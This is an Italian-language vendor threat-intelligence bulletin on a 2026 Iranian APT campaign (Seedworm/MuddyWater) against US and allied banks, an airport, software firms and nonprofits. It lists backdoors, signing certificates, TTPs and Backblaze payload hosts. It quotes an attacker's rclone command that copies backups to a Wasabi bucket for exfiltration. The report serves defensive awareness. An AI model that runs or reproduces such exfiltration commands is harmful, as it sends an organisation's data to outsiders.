All'inizio di questa settimana abbiamo scritto un post sul blog dedicato alle questioni informatiche nel contesto della guerra tra Stati Uniti e Israele contro l'Iran, denominata Operation Epic Fury. In quell'occasione abbiamo osservato che ci sarebbe stata un'elevata risposta da parte degli attori delle minacce sponsorizzati dallo Stato, contro le organizzazioni occidentali con una presenza in Medio Oriente, come ritorsione per questi attacchi.
Tuttavia, le recenti analisi dei ricercatori di threat intelligence rivelano un notevole aumento delle attività informatiche dannose dal nostro ultimo blog post, attribuite al gruppo di Advanced Persistent Threat (APT) allineato allo Stato iraniano Seedworm (noto anche come MuddyWater, Temp Zagros o Static Kitten). Questa attività ha colpito direttamente diverse organizzazioni statunitensi in settori critici e si allinea con l'aumento delle tensioni geopolitiche in seguito alle recenti azioni militari in Medio Oriente.
1. Organizzazioni statunitensi e alleate prese di mira
L'attività di Seedworm, rilevata per la prima volta all'inizio di febbraio 2026, è stata osservata in diverse reti di alto valore:
- Una banca statunitense
- Un aeroporto statunitense
- Una società di software statunitense (con una presenza israeliana)
- Organizzazioni no-profit sia negli Stati Uniti che in Canada.
Queste intrusioni sono continuate all'inizio di marzo, il che indica una campagna attiva e in corso.
2. Backdoor e malware appena identificati
I ricercatori hanno identificato diverse famiglie di malware distribuite negli ambienti delle vittime:
- Backdoor Dindoor:
o Precedentemente sconosciuta
o Utilizza il runtime Deno JavaScript/TypeScript
o Trovata nella filiale israeliana della società di software presa di mira, in una banca statunitense e in un'organizzazione non profit canadese.
o Firmata con un certificato rilasciato a "Amy Cherne".
- Backdoor Fakeset (basata su Python):
o Trovata nell'aeroporto statunitense e in un'altra organizzazione no-profit
o Firmata con certificati legati a "Amy Cherne" e "Donald Gay" (precedentemente utilizzati nel malware Seedworm)
- Catena di malware Stagecomp → Darkcomp:
o Firmato anch'esso con il certificato "Donald Gay
o Collegato a Seedworm dai principali fornitori, tra cui Google, Microsoft e Kaspersky.
Questi impianti di malware dimostrano un set di strumenti diversificato e indicano un obiettivo deliberato della catena di approvvigionamento, della finanza e delle infrastrutture critiche.
3. Tentativi di esfiltrazione dei dati
In almeno un caso, gli aggressori hanno tentato di esfiltrare i dati dalla società di software presa di mira utilizzando Rclone in un bucket di archiviazione cloud Wasabi, anche se il successo di questo tentativo non è stato confermato.
4. Infrastruttura e consegna
- La distribuzione del malware ha sfruttato i server di archiviazione in-the-cloud di Backblaze, indicando l'uso da parte di Seedworm di un'infrastruttura in-the-cloud affidabile per il comando e il controllo e la distribuzione del payload.
- L'uso di certificati di codifica (compresi quelli dannosi osservati in precedenza) suggerisce uno sforzo persistente per apparire legittimi ed eludere il rilevamento.
TTP (Tattiche, Tecniche e Procedure) e IOC (Indicatori di Compromissione)
MuddyWater si evolve costantemente per eludere il rilevamento, sfruttando un mix di malware personalizzato e tecniche di "vita in loco".
- Accesso iniziale:Utilizza principalmente lo spearphishing con documenti abilitati alle macro (ZIP, PDF, XLSM), spesso utilizzando esche come false offerte di lavoro.
- Esecuzione e persistenza:Utilizza in larga misura PowerShell offuscato, DLL side-loading (ad esempio, goopdate.dll) e strumenti RMM come Atera o ScreenConnect. Spesso compilano il codice sui computer di destinazione per evitare il rilevamento basato su file.
- Arsenale del malware:Utilizza strumenti come POWERSTATS, Mori, Canopy (Starwhale), MuddyRot, UDPGangster e Phoenix.
- Evasione della difesa:Impiega strumenti anti-analisi/anti-forensics, tra cui il rilevamento di sandbox e la cancellazione dei registri.
Campagne e sviluppi recenti (2025-2026)
- Operazione Olalampo (febbraio 2026):Ha preso di mira entità di alto profilo.
- Obiettivi:Le campagne in corso hanno come obiettivo entità finanziarie/governative occidentali e mediorientali.
- Cellulare:Collegato a DCHSpy, uno spyware modulare per Android.
1. Famiglie di malware / Backdoor
Queste famiglie di malware sono state osservate in diverse reti di vittime statunitensi, canadesi e israeliane:
- Dindoor Backdoor - una backdoor precedentemente sconosciuta che utilizza il runtime Deno JavaScript/TypeScript.
- Fakeset Backdoor - backdoor basata su Python distribuita nelle reti aeroportuali e no-profit statunitensi.
- Stagecomp Loader → Darkcomp Backdoor - Stagecomp rilascia e carica Darkcomp; collegato a Seedworm da Google, Microsoft e Kaspersky.
2. Certificati di firma del codice dannosi
Seedworm è noto per l'abuso di certificati di firma del codice fraudolenti o compromessi. I seguenti sono stati direttamente collegati a questa campagna:
- Certificato rilasciato a "Amy Cherne" - utilizzato per firmare le backdoor Dindoor e Fakeset.
- Certificato rilasciato a "Donald Gay" - utilizzato per firmare il malware Fakeset e Stagecomp, già visto in precedenza nelle attività di Seedworm.
3. Infrastruttura dannosa o sospetta
Hosting del payload (Backblaze B2 Cloud Storage)
Utilizzato come server di distribuzione del malware:
- gitempire.s3.us-east-005.backblazeb2.com
- elvenforest.s3.us-east-005.backblazeb2.com
Destinazione dell'esfiltrazione dei dati (Rclone a Wasabi Cloud Storage)
- Tentativo di esfiltrazione utilizzando:
rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x
Questa campagna mostra il chiaro intento degli attori delle minacce iraniane di infiltrarsi nelle reti statunitensi e alleate nei settori della finanza, dell'aviazione, del software e del non profit. La combinazione di nuove backdoor, famiglie di malware note, C2 basato su cloud e tentativi di esfiltrazione suggerisce un approccio operativo in più fasi, probabilmente finalizzato all'accesso a lungo termine, allo spionaggio o a future azioni di disturbo.
Se siete preoccupati per una qualsiasi delle minacce descritte in questo bollettino o se avete bisogno di aiuto per determinare le misure da adottare per proteggervi dalle minacce più rilevanti per la vostra organizzazione, contattate il vostro account manager o, in alternativa,mettetevi in contattoper scoprire come proteggere la vostra organizzazione.